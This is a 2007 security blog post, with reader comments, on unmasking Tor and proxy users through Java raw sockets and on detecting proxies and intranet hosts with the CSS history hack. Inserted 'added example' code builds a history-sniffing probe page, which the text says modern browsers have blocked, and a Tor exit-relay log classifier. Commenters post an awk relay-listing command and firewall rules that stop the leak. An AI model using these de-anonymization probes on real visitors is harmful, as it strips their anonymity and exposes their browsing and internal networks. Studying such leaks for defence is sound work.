De-anonymizing Tor and Detecting Proxies
Okay, whew, I finally got around to building out some demos of the things I’ve been talking and thinking about. I’m not as crazy busy as Jeremiah, but I am speaking at the APWG conference, an invite-only malware conference, a local Rotary meeting, the NJ OWASP conference, the SD ISSA conference and the big OWASP/WASC conference in San Jose. So yeah, I’m swamped. Don’t expect much posting for a while. But in the meantime here are two interesting proxy tidbits.
The first is something you may have seen in passing; Jeremiah and I mentioned it in our Blackhat talk and in the follow-up podcast. This code (it takes several seconds to load) uses a piece of JavaScript to instantiate a raw Java Socket() back to the origin site. A raw TCP socket opened by the Java runtime does not consult the browser’s HTTP proxy settings, so the connection leaves directly from the user’s real address, and the origin server only has to record where that connection came from and show it next to the address the proxied HTTP request arrived from. That de-anonymizes anyone who relies on the browser’s proxy configuration alone: it works for Tor and for just about any HTTP proxy I can think of. Two caveats a practitioner should keep in mind: Java’s same-origin restriction still applies, so the socket has to go back to the host the page was served from (which is why CGI-style web proxies are not affected), and the trick does nothing against a host firewall or a transparent, system-wide proxy that forces every outbound connection through the anonymizer (several commenters below describe exactly that setup). Cool stuff.
The next demo is a tiny slice of HTML that simply tries to detect whether you are behind an HTTP proxy (for example an Apache proxy using mod_proxy). It works by forced browsing: it sends the browser to a host that cannot normally exist (http://test/), creates an error using the %-- trick, and then uses the CSS history hack (no JavaScript required) to check whether that URL ended up in your history. If the browser was able to "visit" a place that normally can’t exist, something in the path resolved it for you, which is a strong hint that a forwarding proxy is in the middle. Treat it as a hint rather than proof, though: as one commenter notes below, Opera records the URL as visited even when it doesn’t exist. Fun!
As a last point, id pointed out to me that we could easily import fierce’s list of common hostnames and quickly enumerate all the possibilities (and probably more) with the JS CSS history hack, and likely recover a lot of internal address space from anyone who happened to surf intranet sites before visiting the hacker’s site. It’s less reliable than port scanning, obviously, since it only reveals hosts the victim already visited, but it’s also far less noisy: the check is purely local to the browser, so nothing is ever sent to the internal hosts themselves.
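Here is the no-JavaScript flavour of that CSS history check written out as a small Node.js generator, so the mechanics of both demos above are visible in one place. This is an added example, not the tor.cgi demo or the HTML snippet linked above: the hostname wordlist, the /hit logging endpoint and the attacker.invalid host are all assumptions, and the %-- error trick is not reproduced. Each candidate URL (the impossible http://test/ plus one http://name/ per intranet hostname) gets an anchor element and a matching :visited rule whose background-image points back at the probing site, so the browser fetches that image only for URLs already in its history; a second function decodes those fetches on the server side. Note that Firefox (from version 4) and Chromium closed this channel in 2011 by no longer letting :visited styles trigger loads or be read back, so this demonstrates the 2007 technique rather than a working sniffer against a current browser.

```javascript
// Added example: builds the no-JavaScript CSS :visited history probe from a
// hosts-style wordlist. Hostnames, the /hit endpoint and attacker.invalid
// are assumptions, not values from the original demo.

// Constructed sample in the style of a hostname wordlist (one name per line).
const SAMPLE_HOSTS = `# constructed sample wordlist
intranet
wiki
mail
# comment lines, blanks and duplicates are skipped
proxy
wiki
`;

// One hostname per line; '#' comments, blanks and duplicates are dropped.
function parseHostsFile(text) {
  const seen = new Set();
  const hosts = [];
  for (const raw of text.split(/\r?\n/)) {
    const name = raw.replace(/#.*/, '').trim().toLowerCase();
    if (!name || !/^[a-z0-9.-]+$/.test(name) || seen.has(name)) continue;
    seen.add(name);
    hosts.push(name);
  }
  return hosts;
}

// Escape text placed into HTML attributes or element bodies.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Candidate URLs: the impossible http://test/ the post uses to expose a
// forwarding proxy, followed by the intranet hosts as http://<name>/.
function probeUrls(hosts) {
  return ['http://test/', ...hosts.map(h => `http://${h}/`)];
}

// Build the probe page. Each <a> gets a :visited rule whose background-image
// is fetched from the probing site only if the URL is in the browser's
// history; the URL itself rides along in the query string of that fetch.
function buildHistoryProbe(urls, logEndpoint = '/hit') {
  const rules = [];
  const links = [];
  urls.forEach((url, i) => {
    const id = `p${i}`;
    rules.push(`#${id}:visited { background-image: url("${logEndpoint}?u=${encodeURIComponent(url)}"); }`);
    links.push(`<a id="${id}" href="${htmlEscape(url)}">${htmlEscape(url)}</a>`);
  });
  return [
    '<!DOCTYPE html><html><head><style>',
    'a { display: block; }', // give every link a box the background can paint into
    ...rules,
    '</style></head><body>',
    ...links,
    '</body></html>',
  ].join('\n');
}

// Server side: map the request path of a background-image fetch back to the
// visited URL it reveals; anything else (favicon, the page itself) is null.
function decodeHit(requestPath, logEndpoint = '/hit') {
  const u = new URL(requestPath, 'http://attacker.invalid'); // base host is a placeholder
  if (u.pathname !== logEndpoint) return null;
  return u.searchParams.get('u');
}

// Stand-alone usage: generate the page and decode one simulated hit.
const PROBE_PAGE = buildHistoryProbe(probeUrls(parseHostsFile(SAMPLE_HOSTS)));
console.log(PROBE_PAGE);
console.log('decoded hit:', decodeHit('/hit?u=http%3A%2F%2Fwiki%2F'));
```

Serve the generated page from the probing host and log every request to the /hit path; each decoded URL is a host the visitor has in their history. Because the comparison happens inside the browser's style engine, the internal hosts never see a packet, which is the "less noisy than port scanning" property the post describes.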
That is all.



September 26th, 2007 at 5:02 pm
Nice and inspiring post.
I deferred my bedtime a bit to put up a cross-browser version: http://hackademix.net/2007/09/26/cross-browser-proxy-unmasking/
Rather than turning your JS+Java PoC into a Java applet (too easy), I used Flash.
Good night
September 26th, 2007 at 8:49 pm
FWIW, I’ve posted about the Java technique here, before. About five months ago:
http://ha.ckers.org/blog/20070406/iphide-vulnerable-to-utf-7-and-may-be-phishing/#comment-27452
Giorgio Maone - although I haven’t tested it yet, my suspicion is that your technique won’t work. The Java technique works because Java doesn’t know that you’re going to be sending an HTTP request with the Socket() object. If you used the URL() object it wouldn’t work. Java will use the browser’s proxy settings.
Similarly, it’s doubtful that the getURL() Flash technique would work since, presumably, that object can only be used with HTTP requests.
September 27th, 2007 at 12:27 am
yawnmoth:
why didn’t you test my demo, or at least read my code right, before voicing your suspicion?
Well, even if you can’t read ActionScript or Perl, it was also explained in my post: XMLSocket is used to make a direct socket connection with a custom Perl server listening on port 9999, which echoes back the unmasked IP.
getURL() usage is incidental to the technique, as it is used in this demo only to refresh the page with the new info — or, in a “real world scenario” to send back the IP to the HTTP layer allowing the out-of-band Perl server to be kept stateless and as tiny as possible.
September 27th, 2007 at 4:21 am
It does seem to work with anonymizers.
I tried this:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://ha.ckers.org/weird/tor.cgi
September 27th, 2007 at 6:12 am
Nice post, I love to see TOR going down
September 27th, 2007 at 6:42 am
Giorgio Maone - I stand corrected. I guess I looked at your code too quickly…
September 27th, 2007 at 7:53 am
@yawnmoth:
No problem, you’re welcome.
I also added credits to your demo in my article, since yours is as cross-browser as mine.
September 27th, 2007 at 8:06 am
Achraf - doesn’t work for me on CGI proxies. And why would it? Just because Java’s Socket object ignores the browser’s HTTP proxy settings (which is reasonable, as I explained earlier) doesn’t mean Java can’t abide by the browser’s “same domain” policies. The reason being that HTTP is an Application layer protocol while TCP (e.g. what you use when you initially connect to the domain and before you’ve actually sent any data) is on the Transport layer.
The Transport layer is constant, when using Java’s Socket object - it’s always going to be TCP. What you can change with Java’s Socket object is the Application layer protocol you’re using.
September 27th, 2007 at 8:08 am
Thanks, Giorgio Maone
September 27th, 2007 at 9:53 am
This is why JanusVM and other transparent proxy approaches work so well. It is easier to anonymize applications and there is no side channel leakage when some plugin or browser helper calls out directly instead of using browser proxy settings.
September 27th, 2007 at 12:03 pm
I tried your de-anonymisation and it wouldn’t work with the FF add-on PhProxy. There is just the proxy IP and an IP I didn’t know…
Your current IP is: 72.36.237.90
Your real IP is: 5.0.2.263
… My IP would start like 84.57…
September 27th, 2007 at 3:21 pm
Hm.. The proxy detection trick doesn’t work with Opera - the URL is considered visited even if it doesn’t exist.
September 27th, 2007 at 5:36 pm
How is this different from the similar POC code that HD Moore published 6 months ago?
http://metasploit.com/research/misc/decloak/
September 27th, 2007 at 5:43 pm
sorry, wrong date…..over a year ago.
September 27th, 2007 at 6:31 pm
Giorgio Maone’s one works over SSH tunneling. Thanks.
September 28th, 2007 at 5:39 am
Looks like the same thing. RSnake mentioned it over a year ago, as well:
http://ha.ckers.org/blog/20060628/community-cookie-logger/
Makes me wonder if that tool has changed, over time, or if it’s worked the way it does (using the Flash and Java techniques) all this time…
Incidentally, the phpBB modification on which my stand-alone tool is based was released just over a year ago, as well:
http://www.phpbb.com/community/viewtopic.php?t=437712
HD Moore’s thing predates even that, however.
September 28th, 2007 at 6:17 am
@SilentBob:
Minimal differences, in fact. As I stated in my post, plugins used as out-of-band decloak devices are hardly news, and I threw my 5-minute XMLSocket PoC at it just because it was such a low-hanging fruit in the ActionScript API reference (yes, now I see there was something similar in HD Moore’s work as well).
Apparently some stuff gets “rediscovered” from time to time, maybe because it’s still more or less ignored in the mainstream: the point is stressing how hard anonymity is, and how easy it is to fall for the dancing pigs.
At any rate, those CSS-based tricks, even though less effective, do look original in this context.
September 28th, 2007 at 8:06 am
R3d1st - that’s because of the terrible regex that I’m doing. It probably did work, but you have a string that matches the regex somewhere in your headers. I could have added some unique string to the front of the IP address when I output it, to make it easier to find with the regex, but alas - I was lazy.
SilentBob - the second one is completely different, the first one is basically the same except it doesn’t use an applet. Although I didn’t discover this part (nor did I say I did) - it was just something I had talked about during the speeches so I figured I should make a proof of concept explaining it better by being more demonstrative. I hope that clears it up.
September 28th, 2007 at 7:02 pm
It would be nice if there was someone who had updated Tor lists to use, like dshield or similar. Tor sucks to use, and 99.9% of the use you see from a server or IRC admin’s point of view is abuse.
I saw not too long ago a DDoS attack all from Tor nodes, so someone had figured out how to incorporate Tor usage into botnets.
Nice article. I’m waiting for the day when this can be done automatically via HTTP filtering or by firewalls. I think it’s pretty much safe to say now that 99% of all established IRC networks ban Tor and most server admins try to keep them banned too.
I know there will be abuse in anything, but the entire concept of Tor allows rampant abuse with no consequences. As far as a home user wanting anonymity, I’ve always used findnot; they may not be the best, but Tor is painfully slow to browse with and just basically sucks.
October 1st, 2007 at 8:18 am
Hi!
Nice hack folks!
Could you please email me your CGI code to my email to understand how you’ve done this hack?
My email is vlan7(at)bigfoot.com
Thanks!
October 7th, 2007 at 2:15 am
de-anonymizing Tor
The guys from the ha.ckers.org web application security lab recently published ways to bypass browser proxies and de-anonymize Tor. Well, nothing really brand new, but it’s still interesting stuff.
Read the full post.
…
October 16th, 2007 at 8:55 am
What if you do not enable JavaScript/Java?
October 17th, 2007 at 6:36 am
Hi, Honey - you are assuming this vulnerability cannot be replicated in Flash - which it most definitely can if Flash is allowed to make socket calls. Also ActiveX controls or other client side applications (PDF, Quicktime, etc…) all have the potential of having this sort of de-anonymization effect if they can make sockets that don’t follow the browser’s proxy settings (this is untested as far as I know).
November 2nd, 2007 at 9:46 am
Since in most cases Javascript is needed to initiate the Java app in the first place, there’s: NoScript http://noscript.net/ for FF. For Flash and Java there are other “fixes.”
But these little workarounds are not new knowledge. They’ve been on Tor’s wiki for a long time: https://www.torproject.org/download.html.en#Warning
No one has ever claimed you can just plug-in Tor and be anonymous. Like everything done right, it takes a little more work than just that!
For those who bash Tor, what’s your problem with it? Tor’s not a bad thing - in fact you should value anything that aids in protecting your privacy… Or maybe you’re someone who aims to breach other’s privacy?
November 3rd, 2007 at 8:32 am
This code doesn’t work with a firewall enabled to block browser direct access. I have XeroBank/Tor network here and even with Noscript disabled, it didn’t reveal my real IP bypassing my firewall rules!!!!
Thanks for this magnificent tip; it will make everyone use a firewall to prevent their true IP from being revealed.
November 7th, 2007 at 8:56 am
How about users who don’t even have Java, JavaScript, Flash and other crap enabled/installed? Also, a paranoid user can block all egress traffic (except what is needed for Tor to function properly).
Also, a great deal of Tor users could be detected with a simple technique. Simply start Tor, let it update its router cache (and do this periodically), and get a list of routers:
awk '/^router / {print $3}' ~/.tor/cached-routers* | sort -u
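As an added example (not the commenter’s one-liner and not the page’s own code), here is the same relay-list idea carried one step further in Node.js: it parses the router lines of cached-routers descriptors, keeps a separate set of relays whose exit policy contains at least one accept line, and matches the client address of each web-server log line against the two sets. The descriptor text and log lines are constructed with RFC 5737 documentation addresses; the field layout of the router line (nickname, address, ORPort, SOCKSPort, DirPort) and the accept/reject exit-policy lines follow the Tor directory spec as I recall it and should be checked against the real files before use. The point the awk one-liner misses is that only exit relays source Tor user traffic: matching every relay address, including guard-only and middle relays, mis-flags the operators of those relays, and a stale cache misses relays that joined after the last update.

```javascript
// Added example: distinguish Tor exit relays from other relays in a
// cached-routers style descriptor dump and classify web-server log lines.
// All addresses and nicknames are constructed (RFC 5737 ranges).

const SAMPLE_DESCRIPTORS = `router relayA 192.0.2.10 9001 0 9030
published 2007-09-27 10:00:00
reject *:*
router relayB 198.51.100.7 443 0 80
published 2007-09-27 10:05:00
accept *:80
accept *:443
reject *:*
router relayC 203.0.113.42 9001 0 0
published 2007-09-27 10:07:00
reject *:*
`;

// Walk the descriptors: a "router" line starts a new relay ("router <nick>
// <address> <ORPort> <SOCKSPort> <DirPort>"); any "accept" line that follows
// before the next router line marks that relay as an exit.
function parseRouterDescriptors(text) {
  const all = new Set();   // every relay address, what the awk one-liner yields
  const exits = new Set(); // relays with a non-empty accept policy
  let current = null;
  for (const line of text.split(/\r?\n/)) {
    const f = line.trim().split(/\s+/);
    if (f[0] === 'router' && f.length >= 6) {
      current = f[2];
      all.add(current);
    } else if (current !== null && f[0] === 'accept') {
      exits.add(current);
    }
  }
  return { all, exits };
}

// Constructed Apache common-log lines; the first field is the client address.
const SAMPLE_LOG = [
  '198.51.100.7 - - [27/Sep/2007:12:00:01 +0000] "GET /weird/tor.cgi HTTP/1.1" 200 512',
  '192.0.2.10 - - [27/Sep/2007:12:00:02 +0000] "GET / HTTP/1.1" 200 1024',
  '203.0.113.99 - - [27/Sep/2007:12:00:03 +0000] "GET / HTTP/1.1" 200 1024',
  'garbage line that does not parse',
];

// Pull the leading IPv4 client address out of a common-log line.
function clientIp(logLine) {
  const m = /^(\d{1,3}(?:\.\d{1,3}){3})\s/.exec(logLine);
  return m ? m[1] : null;
}

// Verdicts: 'exit' = plausible Tor user traffic; 'relay' = address of a
// non-exit relay (its operator, not a Tor user, is probably browsing);
// 'direct' = not in the relay list at all; 'unparsed' = bad log line.
function classifyLog(lines, relays) {
  return lines.map(line => {
    const ip = clientIp(line);
    if (ip === null) return { ip, verdict: 'unparsed' };
    if (relays.exits.has(ip)) return { ip, verdict: 'exit' };
    if (relays.all.has(ip)) return { ip, verdict: 'relay' };
    return { ip, verdict: 'direct' };
  });
}

// Stand-alone usage.
const RELAYS = parseRouterDescriptors(SAMPLE_DESCRIPTORS);
const VERDICTS = classifyLog(SAMPLE_LOG, RELAYS);
for (const v of VERDICTS) console.log(`${v.ip ?? '-'}\t${v.verdict}`);
```

Feed the real cached-routers files in place of SAMPLE_DESCRIPTORS and your access log in place of SAMPLE_LOG; only the 'exit' verdict is evidence of Tor client traffic, and even that should be refreshed as often as the cache itself.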
November 8th, 2007 at 12:33 am
Just for the record, the rules required for Tor while you’re using a browser like XeroBank are the following. You have to apply them to the Firefox.exe file, which is placed in XeroBank’s directory:
Where the protocol is TCP
where the direction is Outbound
And where the remote port is HTTP, HTTPS
Block It
HTTP = port 80
HTTPS = port 443
If you do that, even if you’re using Noscript to allow everything to perform that test, your firewall will prevent the browser from leaking your true IP. I checked here and when my firewall was closed, my true IP was indeed disclosed. So, the bottom line is: if you need to prevent such direct connections, you have to set these rules on your firewall. Otherwise, your true IP will be leaked!
There are more rules here:
http://www.wilderssecurity.com/showpost.php?p=1020429&postcount=9
I strongly recommend everyone to see what was explained on this board.
December 1st, 2007 at 8:26 pm
There’s a way to fix this problem (Java leaking your true IP). And you don’t even need a firewall to prevent that. You just have to modify Java Cpanel from Windows and make Java go through the same proxy settings XeroBank is using!
Go to Java Control Panel on Windows, General - Network settings:
Instead of “Use browser settings” you have to leave the option “Use proxy server” selected. Go to Advanced… and fill these forms:
Advanced Network Settings
HTTP: Port: 0
Secure: Port: 0
FTP: Port: 0
Socks: localhost - Port: 9050
Leave this option unmarked:
“Use same proxy server for all protocols” (I think)
I tried that and when I checked both pages, already allowed on Noscript whitelist, they didn’t reveal my true IP!!!!!!!
http://ha.ckers.org/weird/tor.cgi
http://www.frostjedi.com/terra/scrip…php?mode=utf16 (127.0.0.1 - localhost again)
Listen to this!!!!!!!!!!
The first hackers.org link shows my Tor IP twice!!!!!! I checked Outpost blocked entries/log history and there’s no sign of Firefox.exe!!!
We don’t need a firewall to block this attempt! We need to configure Java itself to make connections using proxy settings! How the hell I didn’t see that before?
Regarding Flash, I didn’t check because it is not installed by default on my XeroBank. But this is a minor verification, since Flash can be blocked entirely for most sites out there (we can’t say the same thing about Java, which is much more required; if we don’t allow Java, many sites can’t even work and we don’t have a choice in the end).
And according to what was said to me, Javascript can’t leak anything.
December 4th, 2007 at 8:32 pm
If you use XeroBank free browser, along with Tor network, these are the correct rules to prevent both Java and Flash from leaking your true IP. Also note that Java is different from Flash.
Java has a control panel on Windows which can be modified so that it performs only proxy connections. Flash doesn’t. The minute I modified the Java cpanel, my Tor IP was reported twice, even while I was not using a firewall.
Browser ruleset
First rule - called “Special Rule”
Where the protocol is TCP
Where the direction is Outbound
and Where the remote host is 127.0.0.1 (255.255.255.255)
and where the remote port is 9050
Allow It
The second rule is called “Browser Block Direct Access”:
Where the protocol is TCP
Where the direction is Outbound
Block It
Please, look at the whole explanation on these links, otherwise you will be lost.
Just remember, you don’t need to disable all plugins. You are entitled to run all of them. But you indeed have to configure your firewall to avoid these leakage attempts. If you do that, then, your privacy is safe.
http://outpostfirewall.com/forum/showthread.php?p=162759
http://www.wilderssecurity.com/showthread.php?t=190073
http://www.wilderssecurity.com/showthread.php?p=994629
http://www.wilderssecurity.com/showpost.php?p=384351&postcount=13
http://www.wilderssecurity.com/showthread.php?t=176514
April 2nd, 2008 at 6:15 pm
Nice article. I’m waiting for the day when this can be done automatically via HTTP filtering or by firewalls. I think it’s pretty much safe to say now that 99% of all established IRC networks ban Tor and most server admins try to keep them banned too.
August 18th, 2008 at 10:21 pm
I appreciate all the works & really nice finding.
BUT.
As long as the user is using script blocking, header modifiers & protocol spoofing, HE/SHE is most secure in many ways. It is really tough for any hacker or script kiddie to do any browser or host exploit.
My formula is simple:
USER + BROWSER (privoxy+tor+i2p+adblock+noscript+header_modifier) = SECURE BROWSING
But I prefer Opera (http://www.opera.com). It’s more flexible & configurable, and obviously MORE SECURE.
December 16th, 2008 at 12:30 pm
I need proxies, ppl, to get on MySpace.
May 11th, 2009 at 4:29 am
Hi… I don’t know how to enable Java when Tor is enabled. I’m using the Firefox 3 browser… I need Java to play a game… I already set the options in the browser to enable Java… Help needed. Any help is greatly appreciated.
January 3rd, 2010 at 7:23 pm
The CSS history hack doesn’t work with hidemyass.com; they give each frame an extra unique variable, which blows the whole thing.
Works great with Kproxy though.
Nice job.